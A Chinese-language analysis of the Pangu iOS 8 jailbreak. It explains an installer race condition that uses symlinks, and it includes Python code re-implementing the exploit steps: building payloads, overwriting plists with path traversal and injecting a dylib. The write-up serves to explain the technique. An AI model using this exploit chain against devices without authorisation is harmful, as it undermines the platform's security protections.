盤古越獄原理分析 讓我們一起來看清它如何越獄的!
盤古團隊的ios8.X的越獄工具是目前備受國人矚目的熱點,那么問題來了,盤古工具究竟是怎么使用漏洞進行越獄的呢?接下來給大家揭開謎團。。。
盤古在用戶空間主要利用了iOS安裝程序的一個漏洞,這里先列出安裝一個應(yīng)用的主要過程:
整個安裝過程分為12個階段,上圖只是列出了起點、終點還是對盤古越獄來說比較重要的階段。大家注意上圖紅線所示的時間區(qū)間,在這個區(qū)間內(nèi)如果在“Staging Directory”中創(chuàng)建一個符號鏈接指向沙盒之外,就可以利用解壓程序向系統(tǒng)目錄寫入文件。同時也可以通過控制壓縮包中的文件列表,在起始處放一個大文件,從而在解壓過程中創(chuàng)建一個符號鏈接。這是在盤古在安裝過程中利用的主要漏洞,后面介紹的盤古在用戶空間的行為基本都是圍繞這個漏洞。
主要的組件
盤古主要由四部分組成:
1、桌面程序:提供資源,控制越獄流程。
2、com.pangu.ipa1.ipa:Socket Server,與桌面程序配合制造競態(tài)條件。
3、pangu.dylib,Socket Server,利用內(nèi)核漏洞安裝Untecher,Cydia等。
4、pangu.tar,Untecher
這里主要涉及的是前兩個組件,及第三個組件中用戶空間相關(guān)的部分。
工作流程
說明:為了驗證自己的分析是正確的,用Python重新實現(xiàn)了盤古桌面程序的功能,利用盤古的Payload可以實現(xiàn)越獄,下面會在主要階段給出相應(yīng)示例代碼。
階段一:安裝輔助程序,獲取相關(guān)資源
1、安裝com.pangu.ipa1.ipa
def install_pangu():
lockdown = LockdownClient()
afc = AFCClient(lockdown)
mci = lockdown.startService("com.apple.mobile.installation_proxy")
file_name = "com.pangu.ipa1.ipa"
afc.set_file_contents("/PublicStaging/" + file_name, open("payload/" + file_name,"rb").read())
mci.sendPlist({"Command":"Install", "PackagePath": "/PublicStaging/" + file_name})
while True:
status = mci.recvPlist()
if not status:
break
completion = status.get("PercentComplete")
if completion:
print "Installing, %s: %s %% Complete" % ("com.pangu.ipa1.ipa", status["PercentComplete"])
if status.get("Status") == "Complete":
print "Installation %s " % status["Status"]
break
mci.close()
afc.stop_session()
lockdown.stop_session()
首先利用AFC服務(wù)將IPA傳到設(shè)備上,然后利用 Installation Proxy 安裝應(yīng)用。
2、獲取Cache
def download_caches():
fc = FileRelayClient()
data = fc.request_sources(["Caches"])
fc.stop_session()
if data:
file_path = "./payload/caches.gz"
output_path = "./payload/caches"
open(file_path,"wb").write(data)
print "Data saved to: %s " % file_path
with open(file_path, "r") as f:
gz = gzip.GzipFile(mode="rb", fileobj=f)
cpio = CpioArchive(fileobj=BytesIO(gz.read()))
cpio.extract_files(files=None,outpath=output_path)
else:
print "Fail to get caches"
raise Exception("Fail to get caches")
調(diào)用 FileRelay 服務(wù),獲取Cache,主要是從中拿到com.apple.mobile.installation.plist
3、修改 com.apple.mobile.installation.plist修改是針對盤古程序的,具體修改如下:
CFBundleExecutable = "../../../../../../usr/libexec/lockdownd";
EnvironmentVariables = { DYLD_INSERT_LIBRARIES = "/private/var/mobile/Media/Pangu-Install/pangu.dylib"; };
4、修改盤古程序的Info.plist
CFBundleExecutable = "../../../../../../usr/libexec/lockdownd";
5、構(gòu)造applicationState.plist
{ "com.pangu.ipa1" = { SBApplicationAutoLaunchForVoIP = :true; }; }
這個會造成盤古程序在設(shè)備重啟后自動運行。
6、com.apple.LaunchServices-056.csstore 主要是為了更新程序列表
7、com.apple.backboardd.plist 禁用“看門狗”
基于上述文件盤古會構(gòu)造三個Payload。
def generate_upgrade_bundle1():
guid_str = get_guid()
with ZipFile("./payload/upgrade1.zip", "w") as payload:
payload.write("./payload/upgrade_bundle/bigfile", "/tmp/bigfile")
payload.write("./payload/upgrade_bundle/com.apple.LaunchServices-056.csstore", "/mobile/Library/Caches/com.apple.LaunchServices-056.csstore")
payload.write("./payload/upgrade_bundle/com.apple.mobile.installation.plist", "/mobile/Library/Caches/com.apple.mobile.installation.plist")
payload.write("./payload/upgrade_bundle/applicationState.plist", "/mobile/Library/BackBoard/applicationState.plist")
payload.write("./payload/upgrade_bundle/com.apple.backboardd.plist", "/mobile/Library/Preferences/com.apple.backboardd.plist")
payload.write("./payload/upgrade_bundle/Info.plist", "/mobile/Applications/" + guid_str + "/ipa1.app/Info.plist")
def generate_upgrade_bundle2():
# os.remove("./payload/upgrade2.zip")
guid_str = get_guid()
with ZipFile("./payload/upgrade2.zip", "w") as payload:
payload.write("./payload/upgrade_bundle/bigfile", "/tmp/bigfile")
payload.write("./payload/upgrade_bundle/com.apple.mobile.installation.plist", "/mobile/Library/Caches/com.apple.mobile.installation.plist")
def generate_upgrade_bundle3():
# os.remove("./payload/upgrade3.zip")
guid_str = get_guid()
with ZipFile("./payload/upgrade3.zip", "w") as payload:
payload.write("./payload/upgrade_bundle/bigfile", "/tmp/bigfile")
payload.write("./payload/upgrade_bundle/com.apple.LaunchServices-056.csstore", "/mobile/Library/Caches/com.apple.LaunchServices-056.csstore")
這個階段會知道三個程序升級包,供下一階段使用。
另外,可以簡單的理解為:執(zhí)行完這個階段就對應(yīng)著盤古提示用戶在手機上啟動程序。
階段二:利用競態(tài)條件安裝文件,構(gòu)造環(huán)境執(zhí)行pangu.dylib
當用戶在手機上啟動程序后,手機上的App會啟動一個Socket Server,等待桌面程序的握手,這個握手的暗語挺有意思。桌面向App發(fā)送:PING,App收到后回應(yīng)桌面:PONG。在握手完成后,盤古開始利用靜態(tài)條件將如上構(gòu)造的三個Payload安裝到手機上。
具體過程為首先利用安裝服務(wù)安裝升級包,在安裝的過程中桌面向App發(fā)送starthook,具體hook的內(nèi)容可以通過調(diào)試App確定是創(chuàng)建一個符號鏈接:
"/private/var/tmp/install_staging.eP7ZzJ/foo_extracted" ---> "/var/"
其中后綴部分會因為每次安裝而不同。
示例代碼:
def fire_race_condition(lockdown, file_name):
mci = lockdown.startService("com.apple.mobile.installation_proxy")
sock = get_sock()
print "----->PING"
sock.send("PING")
msg = sock.recv(4)
if msg == "PONG":
print "<-----PONG "
upgrade_pangu(mci, file_name)
print "----->starthook"
sock.send("starthook")
msg = sock.recv(4)
if msg == "succ":
print "<-----success "
else:
print "<-----fail "
在完成安裝三個Payload之后,盤古會上傳文件到Media中的 Pangu-Install目錄:
Cydia.tar
packagelist.tar
pangu.dylib
pangu.tar
pangu_ex.tar
至此,盤古基本完成了用戶空間的行為,在界面上的反應(yīng)為:盤古會第一次重啟設(shè)備。
階段三:利用漏洞安裝Untecher,Cydia
設(shè)備重啟完成后,pangu.dylib會被加載,并啟動一個 Socket Server。桌面程序在檢測到設(shè)備加載后會向 pangu.dylib 發(fā)送:55AA,pangu.dylib 接到 55AA后開始安裝Untecher、Cydia。
階段四:清理
在pangu.dylib完成工作后,向桌面程序發(fā)送:AA55,桌面程序開始清理臨時文件,刪除Provisional文件,恢復(fù)設(shè)備時間等操作。在完成清理操作后,桌面程序會第二次重啟設(shè)備,至此越獄完成。
關(guān)鍵詞: 盤古越獄 盤古越獄原理分析